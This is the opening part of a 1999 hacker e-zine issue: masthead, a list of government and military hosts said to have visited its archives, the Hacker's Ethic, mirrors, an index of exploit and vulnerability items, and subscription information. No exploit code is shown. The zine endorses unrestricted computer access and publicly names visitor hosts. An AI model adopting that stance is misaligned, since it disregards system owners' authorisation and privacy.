[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                        <=-[ HWA.hax0r.news ]-=>                        =
==========================================================================
[=HWA'99=] Number 39 Volume 1 1999 Oct 24th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================

Today the spotlight may be on you, some interesting machines that have
accessed these archives recently...

marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil
citspr.tyndall.af.mil
kelsatx2.kelly.af.mil
kane.sheppard.af.mil
relay5.nima.mil
host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil
saic2.nosc.mil
wygate.wy.blm.gov
mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil
ws088228.ramstein.af.mil
car-gw.defence.gov.au
unknown-c-23-147.latimes.com
nytgate1.nytimes.com

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

The Hacker's Ethic

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative. Among true
computer people, being called a hacker is a compliment. One of the traits
of the true hacker is a profoundly antibureaucratic and democratic spirit.
That spirit is best exemplified by the Hacker's Ethic. This ethic was best
formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer
Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking, not bogus criteria such as
    degrees, age, race, or position.
5 - You can create art and beauty on a computer.
6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

A Comment on FORMATTING:

Oct'99 - Started 80 column mode format, code is still left untouched since
formatting will destroy syntax.

I received an email recently about the formatting of this newsletter,
suggesting that it be formatted to 75 columns. In the past I've endeavoured
to format all text to 80 cols except for articles, site statements and urls,
which are posted verbatim. I've decided to continue with this method unless
more people complain. The zine is best viewed in 1024x768 mode with UEDIT....

- Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

New mirror sites

http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

*  Crappy free sites but they offer 20M & I need the space...

** Some issues are not located on these sites since they exceed the file
   size limitations imposed by the sites :-( please only use these if no
   other recourse is available.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive,
tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html                 ** NEW **
http://www.alldas.de/hwaidx1.htm       ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa                         *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (Remember I'm doing this for
me, not you; the fact some people happen to get a kick/use out of it is of
secondary importance.)

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN, nor
could any other 'digest' of this type do so.

It *is* intended, however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many sources
as possible and providing links to further info. It's a labour of love and
will be continued for as long as I feel like it; I'm not motivated by
dollars or the illusion of fame. Did you ever notice how the most
famous/infamous hackers are the ones that get caught? There's a lot to be
said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #39
=-----------------------------------------------------------------------=

We could use some more people joining the channel, it's usually pretty
quiet, we don't bite (usually), so if you're hanging out on irc stop by and
idle a while and say hi...

*******************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
***                                                             ***
***  please join to discuss or impart news on techno/phac scene ***
***  stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
***  Note that the channel isn't there to entertain you its for ***
***  you to talk to us and impart news, if you're looking for fun***
***  then do NOT join our channel try #weirdwigs or something...***
***  we're not #chatzone or #hack                               ***
***                                                             ***
*******************************************************************

=--------------------------------------------------------------------------=
Issue #39
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key    Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

`ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should
not be taken away from those who use it properly." This is our new motto.

=--------------------------------------------------------------------------=
Key    Content
=--------------------------------------------------------------------------=

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Exploit for Openlink's web configurator for Linux/glibc2.........
04.0 .. sco_cancel.c yields egid=18(lp) Tested on SCO 5.0.5+Skunkware98..
05.0 .. Smail + RPMmail Exploit..........................................
06.0 .. ftpspy, ftp exploit..............................................
07.0 .. A vulnerability exists in the /usr/lib/merge/dos7utils program...
08.0 .. SCO OpenServer symlink vulnerability (Brock Tellier).............
09.0 .. GREX cyberspace.org - Free shell access..........................
10.0 .. Shamrock Says it Was All A Lie ..................................
11.0 .. China Fortifies Cyber Defenses ..................................
12.0 .. Amnesty Program for Pirated Software Fails Miserably ............
13.0 .. A New Look at InfoWar ...........................................
14.0 .. Another Security Challenge ......................................
15.0 .. University Shutdown After Attack ................................
16.0 .. More Melissa Strains ............................................
17.0 .. Loyalty Cards are Not As Private As People Think ................
18.0 .. Interview With the Cult of the Dead Cow .........................
19.0 .. Amazon.com Hosts Crypto Challenge ...............................
20.0 .. Web Sites Cause Crime, Report Says ..............................
21.0 .. China to Use Viruses During War .................................
22.0 .. Call for Public Security Database ...............................
23.0 .. GAO Calls for Security Laws .....................................
24.0 .. RingZero Still on the Loose .....................................
25.0 .. MTV Called Inexcusable By ITC ...................................
26.0 .. Bush Web Site Defaced ...........................................
27.0 .. Space Rogue, Editor of HNN, on ABC News Webcast Today ...........
28.0 .. 20% of Hosts in Singapore Vulnerable ............................
29.0 .. Zambia's First Computer Crime Trial .............................
30.0 .. Russian Infowar Debunked ........................................
31.0 .. Distributed Coordinated Attacks .................................
32.0 .. Possible Network Intrusion Scenario .............................
33.0 .. Intrusion Detection Provides A Pound Of Prevention ..............
34.0 .. Advanced buffer overflow exploit Written by Taeho Oh.............
35.0 .. UK Gov. Given Lifetime Menace Award .............................
36.0 .. DOD Sys Admins Need Top Secret Clearance ........................
37.0 .. Singapore Tough on Cyber Crime ..................................
38.0 .. Student Poses as Teacher for Prank ..............................
39.0 .. Axent Makes Outrageous Claims ...................................
40.0 .. Where Do We Stand With Crypto ...................................
41.0 .. Customs Service Uses Web to Catch Crooks ........................
42.0 .. Virus and Marines Fight It Out In the Pentagon ..................
43.0 .. LAPD Abuse Wiretapping Power ....................................
44.0 .. Three Blind Men Await Trial in Israel For Computer Crime ........
45.0 .. ARM Target of Cyber Attack ......................................
46.0 .. Military Unit Formed For Domestic Deployment ....................
47.0 .. cDc Interview Posted On Slashdot ................................
48.0 .. Buffer Overflow in Communicator May Allow Code to Run ...........
49.0 .. Listserver hacked................................................
50.0 .. Skewl: "How a Netmask Works" By Steven Lee.......................
51.0 .. More proxies supplied by IRC 4 ALL...............................
52.0 .. Perl source for a webspoofing HTTP grabber.......................
53.0 .. MACMILLAN USA MOVES TO SECURE LINUX..............................
54.0 .. ANONYMOUS REMAILERS..............................................
55.0 .. PROJECT GAMMA STILL DOWN.........................................
56.0 .. PRIVATE DESKTOP..................................................
57.0 .. Y2K RELATED DISASTER.............................................
58.0 .. ANTI-MS SOFTWARE.................................................
59.0 .. HOTMAIL: ANOTHER VULNERABILITY, THE SOAP CONTINUES...............
60.0 .. Books: Hacking Exposed: Network Security Secrets and Solutions ..
61.0 .. Microsoft Java Virtual Machine Class Cast Vulnerability..........
62.0 .. OmniHTTPD Buffer Overflow Vulnerability..........................
63.0 .. Linux cwdtools Vulnerabilities...................................
64.0 .. WU-Ftpd NEW DoS vulnerability....................................
65.0 .. Axent Raptor Denial of Service Vulnerability.....................
66.0 .. RedHat screen pty(7) Vulnerability...............................
67.0 .. Microsoft Excel File Import Macro Execution Vulnerability........
68.0 .. Checkpoint Firewall-1 LDAP Authentication Vulnerability..........
69.0 .. Microsoft Excel SYLK Macro Execution Vulnerability...............
70.0 .. Wu-ftpd message Buffer Overflow Vulnerability....................
71.0 .. Tribal Voice PowWow Password Vulnerabilities.....................
72.0 .. RedHat lpr/lpd Vulnerabilities...................................
73.0 .. Gauntlet Firewall Rules Bypass Vulnerability.....................
74.0 .. Microsoft IE5 Javascript URL Redirection Vulnerability...........
75.0 .. OpenLink 3.2 Remote Buffer Overflow Vulnerability................
76.0 .. RedHat PAM NIS Locked Accounts Vulnerability.....................
77.0 .. Microsoft IE5 IFRAME Vulnerability...............................
78.0 .. SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability.............
79.0 .. ARE VIRUSES Y2K COMPLIANT?.......................................
80.0 .. COMPUTER SECURITY AT CENTER OF DOE PROBLEMS......................
81.0 .. US REVISITS SOURCE CODE LIMITS...................................
82.0 .. SECURITY FOR AD-HOC WIRELESS NETWORKS............................
83.0 .. GOV'T IT EXECS SEEK SOFTWARE ACCOUNTABILITY......................
84.0 .. DEFAULT #7 OUT...................................................
85.0 .. UK POLICE GETTING THE POWER TO TAP E-MAIL?.......................
86.0 .. WASHINGTON DIVIDED ON NET SIGNATURES BILL........................
87.0 .. FEDS STILL HAVING TROUBLE FINDING CYBERSECURITY..................
88.0 .. CALIFORNIA TAKES DIGITAL SIGNATURES INTO USE.....................
89.0 .. AMAZON'S CRYPTO CONTEST CRACKED WITHIN HOURS.....................
90.0 .. SANS: CYBERSECURITY RISKS REAL ..................................
91.0 .. "INTERVIEW" WITH MISTUH CLEAN....................................
92.0 .. Inside Happy Hacker Oct 20th.....................................
93.0 .. Security Focus Newsletter........................................
94.0 .. THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2.........

=-------------------------------------------------------------------------------=

AD.S   .. Post your site ads or etc here, if you can offer something in
          return that's tres cool, if not we'll consider ur ad anyways so
          send it in. Ads for other zines are ok too btw, just mention us
          in yours, please remember to include links and an email contact.
          Corporate ads will be considered also and if your company wishes
          to donate to or participate in the upcoming Canc0n99 event send
          in your suggestions and ads now... n.b. date and time may be
          pushed back, join the mailing list for up to date information.
          Current dates: POSTPONED til further notice, place: TBA.

Ha.Ha  .. Humour and puzzles ............................................
          Hey You!.......................................................
          =------=.......................................................
          Send in humour for this section! I need a laugh and it's hard
          to find good stuff... ;)

SITE.1 .. Featured site, ................................................
H.W    .. Hacked Websites ...............................................
A.0    .. APPENDICES.....................................................
A.1    .. PHACVW linx and references.....................................

=--------------------------------------------------------------------------=
@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA. IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF "ME EITHER"S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING.
LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED. THE CURRENT LINK
IS http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
NETIQUETTE IN ANY WAY. IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY,
CURRENT EMAIL cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS. IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL. THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C), WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE
YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR.

- EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so I'll print any and all news but will quote sources when the
source is known; if it's good enough for CNN it's good enough for me. And
I'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If
you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop. If you are outside of the U.S.A or Canada /
North America (hell, even if you are inside ..) and wish to send printed
matter like newspaper clippings, a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc, well, now you can. (w00t) Please no more inflatable sheep or plastic
dog droppings, or fake vomit, thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM, so I know a lot of you
~~~~~~~  are reading this from some interesting places; make my day and get
a mention in the zine, send in a postcard. I realize that in some places it
is cost prohibitive, but if you have the time and money be a cool dude / gal
and send a poor guy a postcard, preferably one that has some scenery from
your place of residence for my collection. I collect stamps too, so you kill
two birds with one stone by being cool and mailing in a postcard. Return
address not necessary, just a "hey guys being cool in Bahrain, take it easy"
will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's, 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a
  burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it.

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Websites;

sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/

@HWA

00.2 Sources ***
     ~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance). Unless otherwise noted, like msgs
from lists or news from other sites, articles and information are compiled
and or sourced by Cruciphux, no copyright claimed.

News & I/O zine ..................http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...

+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.

http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide. If no response is received by a week or two it is assumed that you
don't care whether the article/email is to be used in an issue or not and it
may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it to
the drop box.

- Ed

Mailing List Subscription Info   (Far from complete)   Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~   ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq. I've
been archiving this list on the web since late 1993. It is searchable with
glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list's charter. I will allow
certain informational posts regarding updates to security tools, documents,
etc. But I will not tolerate any unnecessary or nonessential "noise" on this
list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are responsible
for the words that you post on this list and that reproduction of those
words without your permission in any medium outside the distribution of this
list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring on
June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to
SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below.
Other than the change of domains nothing of how the list is run changes. I
am still the moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The archives go
back longer than Netspace's and are more complete than Geek-Girl's.

The move will occur one week from today. You will not need to resubscribe.
All your information, including subscription options, will be moved
transparently.

Any of you using mail filters (e.g. procmail) to sort incoming mail into
mail folders by examining the From address will have to update them to
include the new address. The new address will be:

BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability
database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums in the spirit
of BUGTRAQ where non-English speaking people or people that don't feel
comfortable speaking English can exchange information.

As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will
continue to be the place to submit vulnerability information, but if you
feel more comfortable using some other language you can give the other
lists a try. All relevant information from the other lists which have not
already been covered here will be translated and forwarded on by the list
moderator.

In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese)
which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will
be moderated by CORE SDI S.A. from Argentina (the folks that brought you
Secure Syslog and the SSH insertion attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same time
providing a comprehensive source of security information.
Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek
Girl herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If you
are interested in viewing the staff pages, please see the 'About' section
on www.securityfocus.com.

On the community creating front you will find a set of forums and mailing
lists we hope you will find useful. A number of them are not scheduled to
start for several weeks but starting today the following list is
available:

* Incidents Mailing List. BUGTRAQ has always been about the discussion of
  new vulnerabilities. As such I normally don't approve messages about
  break-ins, trojans, viruses, etc with the exception of wide spread cases
  (Melissa, ADM worm, etc). The other choice people are usually left with
  is to email CERT, but this fails to communicate this important
  information to others that may be potentially affected.

  The Incidents mailing list is a lightly moderated mailing list to
  facilitate the quick exchange of security incident information. Topical
  items include such things as information about rootkits, new trojan
  horses and viruses, sources of attacks and tell-tale signs of intrusions.

  To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of:

  SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along with
ten other forums over the next two months. These forums will be built and
moderated by people in the community as well as vendors who are willing to
take part in the community building process.

*Note to the vendors here* We have several security vendors who have agreed
to run forums where they can participate in the online communities. If you
would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.

On the information resource front you find a large database of the
following:

* Vulnerabilities. We are making accessible a free vulnerability database.
  You can search it by vendor, product and keyword. You will find detailed
  information on the vulnerability and how to fix it, as well as links to
  reference information such as email messages, advisories and web pages.
  The database itself is the result of culling through 5 years of BUGTRAQ
  plus countless other lists and news groups. It's a shining example of how
  thorough full disclosure has made a significant impact on the industry
  over the last half decade.

* Products. An incredible number of categorized security products from over
  two hundred different vendors.

* Services. A large and focused directory of security services offered by
  vendors.

* Books, Papers and Articles. A vast number of categorized security related
  books, papers and articles. Available to download directly from our
  servers when possible.

* Tools. A large array of free security tools. Categorized and available
  for download.

* News: A vast number of security news articles going all the way back to
  1995.

* Security Resources: A directory to other security resources on the net,
  as well as many other things such as an event calendar.

For your convenience the home-page can be personalized to display only
information you may be interested in. You can filter by categories,
keywords and operating systems, as well as configure how much data to
display.

I'd like to thank the fine folks at NETSPACE for hosting the site for as
long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services useful. I
invite you to visit http://www.securityfocus.com/ and check it out for
yourself. If you have any comments or suggestions please feel free to
contact me at this address or at aleph1@securityfocus.com.

Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available on
http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane
Systems, the author of "Applied Cryptography," and an inventor of the Blowfish,
Twofish, and Yarrow algorithms. He served on the board of the International
Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer
and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way
I'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List
From: mea culpa
Subject: Where has ISN been?
Comments: To: InfoSec News
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away.. Not really.

Several months ago the system that hosted the ISN mail list was taken offline.
Before that occurred, I was not able to retrieve the subscriber list. Because
of that, the list has been down for a while. I opted to wait to get the list
back rather than attempt to make everyone resubscribe.

As you can see from the headers, ISN is now generously being hosted by Security
Focus [www.securityfocus.com]. They are providing the bandwidth, machine, and
listserv that runs the list now.

Hopefully, this message will find all ISN subscribers, help us weed out dead
addresses, and assure you the list is still here. If you have found the list
to be valuable in the past, please tell friends and associates about the list.
To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname
lastname". To unsubscribe, "unsubscribe isn".

As usual, comments and suggestions are welcome. I apologize for the down time
of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters to
distribution of information security news articles. These articles will come
from newspapers, magazines, online resources, and more.

The subject line will always contain the title of the article, so that you may
quickly and efficiently filter past the articles of no interest.

This list will contain:

 o Articles catering to security, hacking, firewalls, new security encryption,
   products, public hacks, hoaxes, legislation affecting these topics and more.
 o Information on where to obtain articles in current magazines.
 o Security Book reviews and information.
 o Security conference/seminar information.
 o New security product information.
 o And anything else that comes to mind..

Feedback is encouraged.
The list maintainers would like to hear what you think of the list, what could
use improving, and which parts are "right on". Subscribers are also encouraged
to submit articles or URLs. If you submit an article, please send either the
URL or the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.

Please do NOT:

 * subscribe vanity mail forwards to this list
 * subscribe from 'free' mail addresses (ie: juno, hotmail)
 * enable vacation messages while subscribed to mail lists
